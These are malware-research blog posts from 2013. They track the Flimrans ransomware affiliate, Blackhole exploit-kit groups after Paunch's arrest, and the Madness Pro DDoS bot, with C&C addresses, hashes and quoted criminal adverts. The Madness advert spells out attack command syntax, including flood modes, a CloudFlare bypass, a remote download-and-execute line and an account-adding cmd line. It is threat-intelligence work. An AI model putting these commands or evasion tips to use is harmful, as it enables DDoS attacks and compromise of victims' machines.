P.S. Also, i would like to remind everyone that my traffic purchasing private partner program is still active. I give EXE and stats, load SOCKS only, it won't affect anything, can be loaded with anything else. If you're interested contact me through Jabber jabber@honese.com

Regards,
Petr Severa
__________________
Jabber(XMPP): jabber @ honese.com
ICQ: 104967

--------------------------------------------

Here is the associated review in video (a copy in case the Original is being pulled out) :
http://www.youtube.com/watch?v=UU6MCPbZCus

Thanks @Xylit0l for multiple hints in that story.

Read more :
Active CookieBomb, CVE 2013-2465 and Reveton - Giuseppe `N3mes1s` - Quequero.org
Crumbling to the Cookiebomb - 2013-08-28 - Martin Lee - Cisco

CookieBomb still dropping malicious content - 2013-08-15 - Krishnan Subramanian - Zscaler

Proof of Concept of "CookieBomb" code injection attack - 2013-07-17 - @unixfreaxp - Malware must die!
Underground [RU] : https://damagelab.org/index.php?showtopic=24376 <- Detailed review by Ar3s

↧

Flimrans Affiliate : Borracho

October 8, 2013, 12:47 pm

≫ Next: Late Disclosure - Darkleech Actors /Home/ - some numbers

≪ Previous: Cookie-Bomb : The "Северная Сказка" Iframer way

In middle of may a new Ransomware appeared (or at least was spotted), pushed in a new Exploit Kit named Flimkit by Chris Wakelin.

Flimkit pushing Flimrans
Encoded Payload in the Jar
404 Call back for stats

Both were really tied, as Kore/Urausy could be or in a less obvious way Cool EK/Reveton.

Ransomware got refered to as : Flimrans

Nothing really new in the clothes...Same designs as the one used by Urausy back in September 2012

Flimrans Design 2013-05
(match Urausy 2012-09)

In middle of June it seems that the group switched to Styx

Styx Pushing Flimrans
2013-06-12
(same infection chain that we could see previously in Flimkit)

Then it seems they moved (or just switched public ?) to affiliate mode as far as middle of July

Advert posted on 2013-07-10
for a locker in affiliate mode

-----------Text of the Advert -----------

Локер/Locker

- Стабильность отстука и конверта

- Много стран

- Любая модель сотрудничества по чекам (НЕ ПРОДАЕТСЯ, только сотрудничество!)

- Имеется необходимый набор инструментов

- и др...

только в ЛС

-----------------------------------------------

- Stable installs rate and conversations

- A lot of Countries

- Choose your business model for Partnership

- We have all needed for work

- and more...

PM Only

----------------------------------------------

Few days later some numbers :

Update to Initial Advert

------------------------------------------------------------------------------------------------

выложу немного строк по конвертам с различных источников и тематик трафика

Adult слитый с бирж

Микс US/EU - 40/60%

27339 955 (334/114/507) 694 (194/93/407) 72.67 % 0/261 1:28 / 1:39 $ 39799

Чистая US

19599 584 (580/1/3) 340 (337/1/2) 58.22 % 0/244 1:33 / 1:57 $ 33920

Микс US/EU - 50/50%

12955 328 (207/37/84) 223 (136/25/62) 67.99 % 0/105 1:39 / 1:58 $ 17345

Non Adult слитый с бирж

Микс US/EU - 50/50%

22337 239 (103/39/97) 150 (55/31/64) 62.76 % 0/89 1:93 / 1:148 $ 9592

Чистая US

8787 139 (136/2/1) 74 (71/2/1) 53.24 % 0/65 1:63 / 1:118 $ 7352

--------------------------------------------------------------------------------------------------

Note : Adult/Non Adult is distinction made on source of Traffic (would say : porn or no)

Strangely it's only since less than three weeks we are seing more and more of it.

Mainly pushed in Sweet Orange

Flimrans Pushed in Sweet Orange
2013-10-03 - Fiddler at the end.

but also in that new HiMan Exploit Kit.

Flimrans pushed in HiMan EK
2013-10-02

What's behind the curtains ?

Borracho.biz - Flimrans Affiliate Entrance

borracho.biz

109.235.49.64

47869 | 109.235.48.0/21 | NETROUTING | NL | EXNW.COM | NETROUTING TELECOM

Borracho - News

Novie filtri!	2013-09-14 \| 20:15
Kto slivaet k nam na exploit, pomimo bloka vseh ostalnih stran, krome spiska nije, dobavilis filtri po browseram i OS. Prinimautsa OS: Seven,XP,98,95,Vista,Eight tak je poka puskaetsa tolko browser IE.
Blok stran \| Exploit Countries Blocked.	2013-08-03 \| 16:04
Kto slivaet k nam na exploit, seichas on prinimaet tolko eti strani: AR CA DA FR IT NO SE AT CH DE GB LU NZ SI AU CR ES GR LV PL SK BE CY EC HU MX PT TR BO CZ FI IE NL RO US Vse ostalnie strani blokiruutsa i ne schitautsa! Who send to our exploit, please send only these countries: AR CA DA FR IT NO SE AT CH DE GB LU NZ SI AU CR ES GR LV PL SK BE CY EC HU MX PT TR BO CZ FI IE NL RO US All other countries will be blocked and not counted!

Note : I think "our Exploit" was Flimrans and they are now giving Sweet Orange Threads.

Sweet Orange Stats tied to a Thread pushing Flimrans.
Beginning of October 2013

Borracho - Money Stats

Borracho - Referral

It seems you can get "help" in the distribution. (see later "files") and get stats from this "sub affiliate".
It's only an assumption. Didn't see it live.

Borracho - Config

Note that the "lock" function delay can be set independently by each affiliate member and changed any time they want. This function allow a less obvious connection between infection source and locking for victims and can also help bypass some Analysis environment.

Borracho - Checks

Voucher are received by the Affiliate operator, checked then % shared with members.
Yes...people are still falling for Ransomware...

Borracho - Files

Each time you download you'll get a fresh file. File is tied to Account ID but parameter behind the get seems to allow you to create a "sub-affiliate" and see how successful is the distribution in "Referral" and "Money Stats"

Borracho - Profile

Borracho - Payments

I made a time consuming Design Grabbing session. The only things new at that time were :

Default Design (if country not targeted - it's also one of the multiple Reveton US design)

Flimrans "Failover" Design

US Design (it's also one of the Reveton US design)

Flimrans US Design - 2013-10

ES Design (this is something new to me)

Flimrans ES Design - 2013-10

C&C: (c&c moved since HiMan EK post)

192.133.139.249
50245 | 192.133.136.0/21 | SERVEREL | US | SERVEREL.COM | SERVEREL

GET /xfczMgBpgmeyU1Xf3MxFA0jxz3aVLa4= HTTP/1.1
Host: opobokuku.de
Cache-Control: no-cache

Analysis by Joe Sandbox Cloud

<edit1 2013-10-09>
Borracho moved or down just after publication of the post.

Flimrans C&Cs:
85.25.84.201 (cf af3750a4623d25c67b911562b99a9ee3 for instance)
8972 | 85.25.0.0/16 | PLUSSERVER | LI | INTERGENIA.DE | INTERGENIA AG

GET /tyjCGcRuh2eyU1Xf3MxFA0jxz3aVLa4= HTTP/1.1
Host: opobokuku.de
Cache-Control: no-cache
--
Host: ydomolyne.de (2013-10-14)
--

@kafeine Another Flimrans C&C: ycyrorezu.de on 198.27.109.127
— Maarten van Dantzig (@MaartenVDantzig) October 9, 2013

198.27.109.127
16276 | 198.27.64.0/18 | OVH | CA | OVH.COM | OVH HOSTING INC.

</edit1>

Files :
Here (Owncloud via goo.gl)
(2 SWO fiddler - 2 Anubis Cloud Analysis - 4 samples)

↧

Late Disclosure - Darkleech Actors /Home/ - some numbers

October 10, 2013, 4:58 am

≫ Next: Paunch's arrest...The end of an Era !

≪ Previous: Flimrans Affiliate : Borracho

To illustrate a post to come on Blackhole Transition here are some numbers for the /home/ aka q.php Blackhole aka Darkleech fuelled.

Note : Darkleech module filter user-agent. Infection tried only on IE (so Opera/Mozilla and others are researchers or honeyclient etcs). Then Blackhole also filter on IE (so 0 infections for others)

Note : Thread Name. Number of Loads.
Browser Filter on blackhole side too.

Last number I was able to see : > 2 800 000 infections.

File : q.php = Pony - Thread mod1
Lock : a.php = Nymain.a - Thread adult (inactive since december)

They were pushing Pony which was then (depending of your country) pushing Urausy or Nymaim.b (which itself was loading Zaccess or Nymaim.a Ransomware). Sébastien Duquette from Eset wrote a nice post about that.

Nymaim.A - Urausy Variant
with B&W Zoo/CP images
(Careful : this design has also been used by Bomba Locker)

Nymaim.A -US Design

2013-04-09 - 20:17 (RU Time) - 31081 infections in 20 hours

q.php Blackhole - 2013-04-09 - 20:17 RU Time
Note the thread name : mod1

2013-04-09 - 21:07
(since monday (day before - 45 hours) numbers)

2013-04-11 - 22:22 - 29398 infections in around 22 hours

q.php Blackhole - 2013-04-11 - 22:22 RU Time

2013-04-12 - 20:29 - 26319 infections in 20.5 hours

q.php Blackhole - 2013-04-12 - 20:29 RU Time

Note : Reveton group were doing as good as this (at least in oct/nov 2012) with Cool EK

Read more :
There are a huge number of posts about this group so i made a selection.
Dissecting FireEye's Career Web Site Compromise 2013-09-18 Dancho Danchev
The Home Campaign: overstaying its welcome 2013-07-02 Sébastien Duquette - Eset
The Evil Came Back: Darkleech's Apache Malware Module - 2013-03-24 -Hendrik Adrian - MalwareMustDie
1940 IPs for a BHEK/ULocker server - Nexcess-Net - 2012-09-14

Post Publication Reading :
Nymaim: Browsing for trouble - 2013-10-23 - Jean-Iain Boutin - Eset

↧

Paunch's arrest...The end of an Era !

October 10, 2013, 7:41 pm

≫ Next: Meet Madness Pro or Few days rise of a Ddos Botnet

≪ Previous: Late Disclosure - Darkleech Actors /Home/ - some numbers

snipshot of :

Spin up of a Supermassive Black Hole
Illustration Credit: Robert Hurt, NASA/JPL-Caltech

Note: This post is a work in progress. Not all group have transitioned. So I will update (if I am able to spot them again) and add some links to significant external posts.
Disclaimer: I do not have the telemetry Antivirus or IDS Vendor can have...sure we could have a better picture than that.

If you are reading this you already know that Paunch, the coder behind Blackhole, has been arrested.

What i will try to cover here is the transition/impact of this on the groups using the Blackhole/Cool EK weapon.
The evolution of what i can see from the "driveby battlefield".

The Actors :

Here are the main groups I am aware of who were using the Blackhole or the Cool EK at the time of arrest. I will describe the distribution, the threats but won't talk (maybe only for now) about the way they handle the "poke a mole" with the Defense (Domains, IPs).

- "Reveton Team" or "Mr.J/MonsterAV" : Cool EK lately on tcp 1024

Cool EK "Reveton" - 2013-10-07 01:37

First customer from Cool EK. I would say their golden age was 1 year ago. They were infecting more than 30k machines a day with Reveton when Cool EK was released (stats were easy to gather)

Distribution : Traffic coming from multiple sources including lately CookieBomb ("Tale of the North" Iframer)
Threat : Mainly Reveton (some Live Security Professional?) . Hundreds of Samples a day. Around 30 threads.

- One Urausy affiliate member (or BestAV itself??) : Cool EK /index.php?p=

Cool EK "Urausy/FakeAV"& Urausy Calling Home
2013-10-04 07:00

Distribution : From what I saw mainly Porn Malvertising and few compromised websites.
Threat : Urausy / Fake AV. See: The missing link - Some lights on "Urausy" affiliate 2013-05-29

- Home Gang (or q.php or Darkleech fuelled) :

/Home/ Blackhole - 2013-09-30

Distribution : Traffic from Darkleech Module (installed on compromised server via Cpanel/ Parallels Plesk vulns)
Filtering IE only both on the Darkleech Side and on the Blackhole itself.
Threat : They were pushing Pony which was then (depending of your country) pushing Urausy or Nymaim.b (which itself was loading Zaccess or Nymaim.a Ransomware). 1 thread, around 30 rotation a day.

See : Late Disclosure - Darkleech Actors /Home/ - some numbers 2013-10-10 (more reading there)

- Ex-Tkr /i/last blackhole (or CDorked.A Fuelled) :

Ex-Tkr Blackhole Pushing Carberp.J (MS) aka Glupteba.G (Eset)
2013-09-16

Distribution : As far as i know mostly Cdorked.A module installed on server running compromised Cpanel/Parallels Plesk, and some fake porn website
Threats : 3 threads, 2 payloads familly : Carberp.J (200ko) and Leechole (50ko)
More than 240 samples a day (15-20 for Carberp - and around 110 for each Leechole).

See: Linux/Cdorked.A malware: Lighttpd and nginx web servers also affected 2013-05-07 Marc-Etienne M. Léveillé 2013-07-05

- /closest/ Blackhole :

BH EK Closest pushing the STI (pay per install clickfraud) Payload
2013-09-26

Distribution : Lately, mainly LinkedIn spam redirecting to some compromised wordpress.
Threats : Zaccess, Cutwail, STI (Pay Per install clickfraud affiliate tied to Zaccess). They pushed some Cridex in the past too.

- /topic/ - Zeus Game Over gang :

This is the blackhole with the highest number of threads. Not sure it can be operated by only one guy. Or he must be really well organised !

/topic/ BH EK pushing 2 payloads (ZGO & Dipverdle (a loader) )
2013-09-30

Distribution : Many compromised website (OT: they are also working a lot by mail attachments)

Threats : More than 60 threads. More than 2000 rotating samples a day.

The main activity is pushing Pony (different for many threads) as a loader for ZeusGameOver.

But we could see also : Medfos, MagicTraffic (PPI ClickFraud tied to Zaccess), some fakeav, even Kovter Ransomware.

- /ngen/ Blackhole

/Ngen/ Blackhole pushing Citadel (you can see the call home : /ckt/ ) and Zaccess
2013-09-11

Note the duqu like front drop (shrift.php - CVE-2011-3402)
Distribution : A lot of compromised website with a TDS sharing (hosted with?) the infrastructure of the Blackhole. (/sword/in.cgi may remind you things)
Threats : Shylock, Zaccess, those day (but some Sinowal, Ursnif, Zbot, Citadel in the past too)

- /xlawr/ Blackhole

/xlawr/ Blackhole pushing FakeRean
2013-09-27

Distribution : mainly compromised websites.

Threats : 2 threads around 50 samples a day: Zaccess and FakeRean 855ko

- Customer "hosted 1" in Rented mode (will cover the main based on traffic amount and longevity).

Distribution : Compromised website, 2 step (with a js on another compromised site as TDS)
Threat : 1 thread, 3 payloads. (i didn't try to define for now - will do).

- /news/ Blackhole

/news/ BH EK pushing Zeus Game Over

Distribution : mainly via spam (lately related to Pinterest)

Threats : fast rotating thread...hard to follow. Lately pushing ZeusGameOver
But in the past they were pushing Cridex/Bugat, or Inlev.B gathering Tesch.A (Zaccess?), or Ursniff
Some of their domains : bbb-complaints.org, pinformer.net, cool-mail.net
They are not new in the business : http://blog.dynamoo.com/2012/06/wire-transfer-hp-spam-and.html
Some Urlquery traces

- /vague/ Blackhole

This blackhole was hard to find. It was the infector for the Citadel /ppp/ that made some noise for being Japan and Germany focused.

Live Infection vector for the Citadel targeting japan illustrated cc @Xylit0l @unixfreaxjp https://t.co/zkDLHV0EDY pic.twitter.com/ahtg3jJQ5l
— kafeine (@kafeine) September 3, 2013

I won't talk about /adfasdfksjdfn/ Sinowal BH EK (while still reachable it's not in use anymore) neither the white/purple Cool EK which is blinking (and quite surely built on a leak of Cool EK Code) neither the /reveals/ or /news/ blackhole (except if i spot the groups after transition).

That day: 2013-10-07

BREAKING: Blackhole exploit kit author "Paunch" and his partners arrested in Russia #Blackhole #Paunch #ExploitKit #Malware
— Maarten Boone RCX (@staatsgeheim) October 7, 2013

This was ground breaking for me...Seeing the source that could only be true.
That really sounds like....malware now need coffee ...or anxiolytic.

I tried to find some kind of evidences.

Crypt.am down. #Paunch pic.twitter.com/HZKkJ5Nb6S
— kafeine (@kafeine) October 7, 2013

I knew it was up few days earlier cause I gave it a visit again after the "Expanding Business: JavaScript Cryptor Offered by Author of Blackhole Exploit Kit" post from Fortinet. (2013-10-01)

Two hours after the tweet, Underground started to react.

Verified :

Verified - Cleaning Mode 2013-10-07
Few hours after the tweet goes viral.

Exploit .in :

Paunch Blackhole forum thread :

Removed.

Paunch renamed

I also noticed that "Sweet Orange" account was active (trying to get some news I guess).
Nuclear Pack was not anymore on both of these forum but still on darkode.

Neutrino Author's reaction :
Price increase for non Russian customers to 10k/month
<edit:2013-10-11>Now 1 000 000$ per month - See advert here : http://pastebin.com/raw.php?i=6xZDGadQ </edit>

Since then we can see some actors trying to reach Paunch associates in Cool EK or find new solution

"желаю Панчу мужества и побыстрее решить проблемы, но несмотря ни на что работать то нужно"
that mean something like :
"I wish Paunch courage and quickly solve the problem, but no matter what we need to work"

or

"Ребят, если кто работал с панчем по приватному проекту связки - дайте знать. Я - один из клиентов. "
that can be translated as :
"Guys, if anyone has worked with Paunch for a private Exploit Kit project - let me know. I am one of the clients."

That same day i tried to make a "photo" of the battlefield state (going on each of the exploit kit illustrated here)

2013-10-07 - between 2 and 3 hours after the news goes viral

What can we see : The Rented Blackhole are already out.
The Darkleech/Home one is also 502ing.
(I was wondering if the operators are not part of the "partners" mentionned in the tweet).
ALL exploit kit are using an almost 4 days old Jar.
In fact it's a simplification cause there are 3 jars (depending of your config) which are :

3bebb777a0b3e7d416a6327a4777b630 - CVE-2013-2465
c61923eb060b42b6d27373b2d44e7839 - CVE-2013-2460
3478966161745cf3401b2a534523a4bc - CVE-2013-0422

And guess what ? you still can't find newer one on Blackhole.
Just now :

Sploit folder state in one of those blackhole.
2013-10-11

The Transition :

- "Reveton Team" or "Mr.J/MonsterAV" :

The redirector linked to the "Tale of the North" iframer restarted the redirect only 5 hours after the tweet traffing to Whitehole.

2013-10-07 5 hours after the tweet
Reveton team has already switched to WhiteHole

That was a weird move knowing the conversion rate of this Exploit Kit.

And it did not take long.

The day after the group was moving again. And what i thought was a Whitehole mutation, was more an intermediate state (to avoid loosing traffic?) :

Reveton team transitionning from WhiteHole (tcp 2780) to ....
Something New on tcp80 - 2013-10-08
ProTransition ! No interruption.

And here is the Reveton Group in it's state today :

Angler EK pushing Reveton
2013-10-08

I won't make a full post about what we will call Angler EK. One Jar Exploit kit for now.

Xoring payload with key easily found on the landing. No Jsdetect. For sure it's an emergency solution.

Why Angler EK ? cause we can't name this a Monster EK.

Advert for Reveton/Live Security Pro Distribution
(nice Angler Fish ! )

Files:Angler EK Fiddler (owncloud via goo.gl)

- Ex-Tkr /i/last blackhole (or CDorked.A Fuelled) :

Reading this : Close encounter with Linux/Cdorked.A - Kimberly 2013-10-13 - Stopmalvertising

It seems this group has moved to Neutrino (>> Seems like those guy talk Russian :) ). Same infection source (compromised website with CDorked.A, same TDS and Domain Pattern).

Thanks Kimberly for the solid Referer

Ex-TKR Neutrino Thread 2013-10-14
Pushing quite surely Carberp.J/Glupteba.G

Payload: 95ffc438836b4bddb4d85faebde775cd 260ko...Should be Carberp.J/Glupteba.G
One more : 0622efb24e8436d50d14f387fdb31fac

And one more pass (from FR to get the Leechole)

Ex-TKR Neutrino Thread 2013-10-14
Pushing maybe Leechole

Payload : feb4dd00e920170c0d0320ab170c83fa 100ko Should be Leechole.

But calls are sligthly different (an upgrade ? something else? ):
-----C&C-----
144.76.84.132 tcp 8000
GET /stat?uptime=100&downlink=1111&uplink=1111&id=0002D9BC&statpass=bpass&version=20131011&features=30&guid=4c59a191-ced9-40d6-887f-1c2d0668a4a6&comment=20131011&p=0&s= HTTP/1.0
(via Joe Sandbox Cloud )
-----------------------

Files: 3 payloads (Owncloud via goo.gl) Would love any feedback on those samples.

- /news/ Blackhole
They are back on Magnitude. By mail again (pinterest stuff).

/news/ Blackhole operators are now on Magnitude
2013-10-16

Three payloads pushed via recently integrated CVE-2013-2551
Here :
ebfe57976c5840a578dd60f997418689 Zaccess
c4d71b94cfe3adbba8f43d927a0d8a0f MS: Inlev.?
35a613825af980eb1010e8462d5acc1d ZeusGameOver

From US same pass dropped me a 4th Payload which was : aa0f08a3fab179a071b1576fd3755a8e (Tesch.B)

Files: 3 payloads (Owncloud via goo.gl) Would love any feedback on the first two samples.
See also : Cutwail Spam Swapping Blackhole for Magnitude Exploit Kit 2013-10-18 - Dell Secureworks CTU

- /vague/ Blackhole :

They move to Nuclear Pack. Here in action :

Nuclear Pack (rejecting non JP traffic) pushing Citadel
2013-10-27

Payload : d6ed9120d489227c7195cb792581f068

- Home Gang (or q.php or Darkleech fuelled) :

No Exploit Kit spotted for Now
Nymaim: Browsing for trouble - 2013-10-23 - Jean-Iain Boutin - Eset

- /topic/ - Zeus Game Over gang :

No Exploit Kit spotted for Now
Zgo keep spreading via mail attachment (source : Dell SecureWorks), now using Upatre.
Read: Upatre: Another Day Another Downloader Brett Stone-Gross and Russell Dickerson - 2013-10-04

--- Blackhole still receiving Traffic 2013-10-11 ---

/closest/

/ngen/

----

--- That's all folks. For now ---

---------------------------------
If you have any intel, information, question about this, I'd love to hear about it. kafeine@dontneedcoffee.com

---------------------------------

Clarification: I did not contact Media as it is written here or there. I only replied to questions I received in my mailbox following some tweets (please consider it before thinking : "Media Whore").

PS : Sharing is part of our defenses. Crediting is part of the trust/sharing process. You can freely use data from here but please, don't be a douchebag, credit your source. Each time I see/read/hear someone bragging with data he easily gathered here (without crediting)... the idea "stop the share""pop" in my mind.

↧

Meet Madness Pro or Few days rise of a Ddos Botnet

October 14, 2013, 8:14 am

≫ Next: Urausy is going Regional in United States

≪ Previous: Paunch's arrest...The end of an Era !

At begining of September I landed on a new instance of Cool Exploit Kit : /paper/

Cool EK pushing Dipverdle which then call Home and gather
Madness ( sometimes no analysis needed ;) ) ddos bot

Dipverdle (MS name) was new to me. I spent time studying the server and I have the feeling that the C&C side is a fork of a Ransomware C&C. ( Supposition : the global picture makes me think Dipverdle could be tied to FretLine the Author of MultiLocker then MultiBotnet)

Dipverdle : 01a08386464149fab0c05e24dc4b64ad
User-Agent: Mozilla/5.0 (Windows NT 5.1)

Madness : 3e4107ccf956e2fc7af171adf3c18f0a

Samples here (Owncloud via goo.gl)

The Diverdle C&C rely on a Sqlite Database.

Dipberdle C&C Db Structure

Dipverdle DB with some content

Feeding Splunk with this database :

16 000 C&C 1st call in (choosen) 4 days

Dipverdle C&C 1st Call in (choosen) 4 days

The Madness C&C :

Madness C&C Login Screen

This was really familiar...

Darkness (Optima) C&C Login Screen - 2012-06-23

See : A peek inside the Darkness (Optima) DDoS Bot - Dancho Danchev - 2012-03-08

Screenshot of the Advert

Original Text :
------------------------------------------
Madness PRO

Дата релиза: 01.09.2013

История создания:
Летом 2012-го года мы задумались о создании принципиально-нового ДДОС бота для тестирования собственных веб-ресурсов на отказоустойчивость, так как ни одна из протестированных систем не заслужила даже оценки "4".
Тестируемые семплы во время работы пожирали память, загружали процессор локальной машины, вылетали с ошибками, зависали на 50% загрузки CPU, неправильно делали записи в реестре, вызывали срабатывание защитных систем, множество весомых ошибок было найдено в панелях управления.
Для создания своей системы мы подробно изучили: BlackEnergy(исходный код), gbot (дисассемблинг), DirtJumper(дисассемблинг), Darkness Optima(исходный код, приобретен по договору), iBot(исходный код, приобретен по договору), w3Bot (исходный код), так же были изучены исходные коды Zeus и многих околотемных программ.

Возможности
- написан на C++, легко криптуется, имеет малый вес (сжатый семпл < 15кб)
- полная совместимость со всеми Windows семейства NT (x86 и x64)
- Бот имеет 7 типов атак
- стабильность в системе. Показатели нагрузки на CPU и ОЗУ очень равномерные.
- Не привлекает внимание UAC и Windows Firewall
- умеет устанавливать port, referal и cookies индивидуально для каждой цели
- поддерживает до 10-ти целей одновременно
- имеет очень низкую нагрузку на CPU благодаря новой, сложной системе парсинга команды (во всех аналогах парсинг проходит внутри функции, в множество потоков - это нагружает процессор лишней работой. Новый бот заносит все данные в массив до начала атаки и на функцю приходят уже готовые параметры: адрес, порт, реферал и т.д.)
- имеет колоссальную выходную мощь более 1500 http (и более 30 000 UDP) запросов в минуту за счет прямого взаимодействия с сетевыми драйверами даже на десктопных Windows! (только при использовании WinSock) Это примерно в 10 раз больше, чем некоторые аналоги и несколько больше лучших (по этому показателю) конкурентов.
- в панели управления отображаются: количество запросов в минуту, права в системе, версия системы.
- поддерживает обход CloudFlare защиты (!!!) и многих других, более простых.
- поддерживает Slow GET и Slow POST режимы!
- в заголовке пакета указывается отключение кеша (Cache-Control: no-cache), что увеличивает нагрузку на сервер.
- защита диалога бот-панель спецключем

Детектирование:
при проверке билда (без крипта и упаковки) только 3 антивируса из всех выдали подозрение (AVIRA, ClamAV, VBA32). Во время локальных тестов ключевые АВ: Kaspersky, Nod32, DrWeb, Avast пропустили файл в 100% случаев.
линк на результат: m.exe - Антивирусный сканер Jotti

Режимы атаки и команды
Так как система является профессиональной синтаксис комманд давольно сложен, но только на первый взгляд =) Синтаксис команд обратносовместим с системой Darkness.

dd1 Основной режим работы по HTTP протоколу методом GET, используя соккеты. Поддерживает ***cookies и $$$ref и допускает до 10 целей одновременно (разделитель ";"). Самая быстрая по количеству запросов атака. Пример: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2

dd2 Тот же режим, что и dd1, только метод POST. Добавляется обязательный параметр @@@post_data. Так же поддерживается до 10-ти целей. Пример: dd2=http://forum.ru/index.php***cookies$$$referal@@@login=yyy&password =hhh, эта команда запостит логин yyy и пароль hhh на скрипт Зенон Н.С.П. - платный хостинг сайтов, качественный хостинг PHP, MySQL и Perl. Выбирайте виртуальный хостинг по доступным ценам. Большой выбор та

dd3 атака по HTTP методом GET используя системную библиотеку WinInet.dll. Старая-добрая атака, используемая в многих Delphi ботах. Медленная из-за ограничений десктопных Windows. Не поддерживает реферал и куки, поддерживает до 10 целей. Пример: dd3=http://host.com/script.php

dd4 атака по HTTP методом POST используя системную библиотеку WinInet. То же что и dd3, только POST. Пример:
dd4=http://host.com/script.php@@@@@@login=yyy&password=hhh

dd5 ICMP атака (пинги). Поддерживается до 10 целей. Пример dd5=198.168.0.1;199.0.0.1

dd6 UDP атака. Поддерживается до 10 целей. Обязательные параметры: порт и текст. Пример: dd6=192.168.0.2:27015@@@flud_text

dd7 атака по HTTP методом GET используя системную библиотеку URMON.dll Средняя по скорости атака, поддерживает до 10 целей и не поддерживает cookies и referal

cfa команда обхода защиты CloudFlare (!). Используется ТОЛЬКО во время работы dd7. Не оставнавливает выполнение команды dd7. Суть проста - бот выполняет ява скрипт, получает нужную cookie и CloudFlare считает запросы сделанные dd7 авторизованными. Пример: dd7=http://site.ru/index.php, затем (через полторы минуты) cfa=http://site.ru/index.php

cmd команда выполняется в коммандном интерпритаторе cmd.exe на локальной машине. Не останавливает выполнение других команд. Пример: cmd=net user goodwin /add

exe команда на загрузку и выполнение EXE файла. Не останавливает выполнение других команд. Файл сохраняется под тем же именем, под которым он был в интернете. Производится 3 попытки скачать файл. Пример: exe=http://site.com/filename.exe

Панель управления:
Мы использовали измененную на ~70% ПУ от другого комплекса (приобретенную по договору на изменение и перепродажу), переписав ее практически полностью, так как было обнаружено слишком много ошибок и код не понравился. Естественно все было исправлено и оптимизировано - новая ПУ Вам понравится!

Скриншоты:
:screenshot: Скриншот|Screenshot (login screen)
:screenshot: Скриншот|Screenshot (see english translation)

Демонстрация:
Так-как система очень мощная и для демонстрации возможностей нужно всего 15-20 ботов, которые всегда в наличии - селлеры постараются продемонстрировать мощность.

Цены:
- тестовая лицензия $0 (только для проверяющих на форумах и тестеров. обновления не предусмотрены)
- базовая лицензия $500 (обновление/ребилд $50, обновление на новую версию $100, цена на модули будет установлена позже)
- полная лицензия $950 (все обновления, ребилды и модули бесплатны)

Скидки:
- 30% для владельцев GBot/Andromeda/Dirt Dumper, базовой лицензии iBot, базовой/серебряной лицензии Darkness
- 50% для владельцев золотой и бриллиантовой лицензии Darkness/iBot
- 20% дополнительно для тех, кто приобретал указанные выше продукты не более недели назад.

Оплата
к оплате принимаются ЯД, WMR/WMZ/WMB, PM и LR. А так же любая валюта через обменник.

Гарантии:
Готовность работать через гаранта любого, известного форума.

Рассрочка
Для имеющих репутацию и/или аттестаты людей предусмотрена система рассрочки. Обсуждается индивидуально.

Контакты
- селлер 1 ICQ: 902300
- селлер 2 ICQ: 903400
- руководитель проекта ICQ: 395891570

Готов пройти проверку на условиях администрации форума.
------------------------------------------
Translated by google as :

------------------------------------------
Madness PRO

Release Date: 01.09.2013

The history of creation :
In the summer of 2012 we started thinking about creating a fundamentally new DDoS - bot to test their own web resources on the fault-tolerance, since none of the systems tested did not deserve to even estimate "4".
The test samples during devoured memory load on the CPU local machine flew with errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing activation of protective systems , many weighty error was found in the control panels .
To create your own system, we have studied in detail : BlackEnergy ( source code ), gbot ( disassembling ), DirtJumper ( disassembling ), Darkness Optima ( source code , purchased under the contract ), iBot ( source code , purchased under the contract ), w3Bot ( source) , were also studied the source code of Zeus and many okolotemnyh programs.

capabilities
- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )
- Full compatibility with all Windows family of NT (x86 and x64)
- Boat has 7 types of attacks
- Stability in the system. Indicators load on the CPU and RAM are very uniform .
- Do not attracted the attention of UAC and Windows Firewall
- Able to establish port, referal and cookies individually for each goal
- Supports up to 10 targets simultaneously
- Has a very low load on the CPU with the new , complex system of parsing commands ( all analogs parsing takes place inside a function in multiple threads - it's extra work load on the processor . New bot enters all data in the array before the attack on the function and come ready options address, port , referral , etc.)
- Has an enormous power output of more than 1500 http ( and more 30000 UDP) queries per minute through direct interaction with the network drivers , even on desktop Windows! (only using WinSock) is about 10 times more than some few analogs and more top ( on this parameter ) competitors.
- In the control panel are : the number of requests per minute , right in the system , the version of the system.
- Supports bypass CloudFlare protection ( !) And many other more common .
- Supports Slow GET and Slow POST modes !
- In the packet header specifies disabling the cache (Cache-Control: no-cache), which increases the load on the server .
- The protection of dialogue bot panel spetsklyuchem

Detection:
checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32, DrWeb, Avast missed a file in 100 % of cases.
Link Result : m.exe - Virus scanner Jotti

Modes of attack and the team
Since the system is a professional syntax commands davolno complex, but only at first sight = ) Command Syntax obratnosovmestim with the Darkness.

dd1 basic mode of operation via HTTP protocol using GET, using sokkety . Supports *** cookies and $ $ $ ref and allows for up to 10 targets simultaneously (separated by " ;") . The fastest search volume attack . Example : dd1 = http://ya.ru *** cookies $ $ $ referal; http://mail.ru *** cookies2 $ $ $ referal2

dd2 same treatment as dd1, only the method POST. Added optional parameter @ @ @ post_data. It is also support for up to 10 targets. Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh on the script Zenon NSP - Paid web hosting , quality hosting PHP, MySQL and Perl. Choose a shared hosting at affordable prices. Great choice that

dd3 attack on the HTTP GET method using a system library WinInet.dll. Good old attack that is used in many Delphi bots . Slow due to the limitations of desktop Windows. Does not support the referral and cookies , supports up to 10 targets . Example : dd3 = http://host.com/script.php

dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:
dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhh

dd5 ICMP attack ( pings ) . Supports up to 10 targets . Example dd5 = 198.168.0.1; 199.0.0.1

dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text. Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text

dd7 attack on the HTTP GET method using a system library URMON.dll average speed attack that supports up to 10 targets and do not support cookies and referal

cfa command to bypass the protection CloudFlare (!). ONLY used during dd7. Not ostavnavlivaet the command dd7. The point is simple - the bot executes java script gets the desired cookie and believes CloudFlare requests made by authorized dd7 . Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.php

cmd command is executed on the command interpreter cmd.exe on the local machine . Does not stop the execution of other commands. Example : cmd = net user goodwin / add

